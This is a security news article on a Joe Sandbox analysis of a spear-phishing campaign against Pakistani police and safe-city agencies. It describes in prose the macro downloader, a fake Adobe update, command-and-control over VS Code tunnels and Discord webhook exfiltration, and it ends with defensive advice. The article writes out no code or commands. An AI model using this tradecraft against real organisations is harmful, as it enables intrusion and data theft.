New Malware Campaign Targets Government Organizations with Advanced Techniques
A newly identified malware campaign is utilizing sophisticated obfuscation methods and multi-stage payload delivery to circumvent traditional security defenses, according to an extensive analysis conducted by Joe Sandbox. This concerning development signals a new phase in cyber threats, particularly affecting government-affiliated organizations.
The attack initiates with a meticulously crafted spear-phishing email directed at employees of the Punjab Safe Cities Authority (PSCA) and the Pakistan Police Integrated Command, Control, and Communication Center (PPIC3). The email masquerades as communication from an internal consultant and references a credible infrastructure initiative called the “Safe Jail Project,” which heightens the chances of user engagement due to its legitimate appearance. The attackers marked the email with high priority and included a read receipt request to create a sense of urgency and authenticity, thereby encouraging recipients to interact without skepticism.
This attack highlights a troubling trend among threat actors who exploit legitimate services and develop multi-layered infection chains to evade detection. By targeting government-linked institutions specifically, the malware campaign demonstrates a focused approach that could have significant repercussions for national security.
Embedded within the phishing email are two malignant attachments. The first is a Word document named “CAD Reprot.doc,” while the second is a PDF titled “ANPR Reprot.pdf.” The deliberate misspellings in these titles are designed to imitate rushed internal communications, further deceiving unsuspecting employees.
Multi-Stage Infection Chain
Upon execution, the Word document triggers a malicious Visual Basic for Applications (VBA) macro, which only operates once users enable content. Once activated, this macro downloads a payload named “code.exe” from a BunnyCDN-hosted domain, utilizing the IServerXMLHTTPRequest2 object. Notably, this macro employs a technique known as VBA stomping, concealing the malicious code in compiled P-code to evade traditional static analysis tools, making detection increasingly difficult.
In tandem with the Word document, the attached PDF introduces a secondary phase of the attack. It displays a fraudulent Adobe Reader error message prompting users to “Update PDF Reader.” If the user clicks the button, they unwittingly initiate a drive-by download of a malicious ClickOnce application dubbed “Adobe.application,” which subsequently fetches a secondary payload disguised as “Adobe.exe.”
One of the most advanced features of this campaign is its utilization of legitimate platforms for command-and-control (C2) communication. The malware executes “code.exe” with parameters that establish a persistent connection through Microsoft’s Visual Studio Code tunnel service. This clever tactic allows the attackers to maintain remote access while blending malicious traffic with that of trusted infrastructure, further complicating detection efforts.
Additionally, the malware employs Discord webhooks for data exfiltration. Functions embedded in the payload send execution status updates and potentially sensitive information to channels controlled by the attackers on Discord, further complicating efforts to detect unauthorized network activities.
Evasion and Persistence Techniques
The malware is designed with various evasion strategies aimed at avoiding detection and analysis. Key techniques include:
- Process Enumeration: Using
tasklist.exeto detect any active instances or sandbox environments. - Unsigned ClickOnce Manifests: Utilizing null public key tokens to bypass trust checks.
- Typosquatting: Employing misspelled file names and impersonating Adobe branding to mislead users.
- Automatic Payload Delivery: Leveraging CDN-hosted infrastructure to minimize reliance on suspicious-looking domains.
These methods, combined with the malware’s sophisticated multi-stage delivery, render it highly effective at bypassing conventional antivirus and endpoint detection systems.
Security assessments have assigned the malware sample a malicious score of 100/100, with a confidence level of 95%. This classification is supported by numerous detection engines, including Suricata, Sigma, YARA, and VirusTotal. The confirmed presence of functional macro-based downloaders and active payload execution leaves little room for doubt regarding its malicious nature.
Ultimately, this campaign underscores a significant shift in attacker tactics. By weaponizing legitimate services such as Microsoft VS Code tunnels and Discord, attackers are becoming increasingly adept at evading security measures that rely heavily on domain reputation and signature-based detection methods.
Organizations are strongly urged to disable macros by default, closely monitor unusual usage of developer tools like Visual Studio Code tunnels, and adopt advanced behavioral detection systems to identify signs of suspicious activities across both endpoints and networks. As malware authors continue to innovate and employ trusted platforms, vigilance and proactive security measures become ever more critical in safeguarding sensitive information.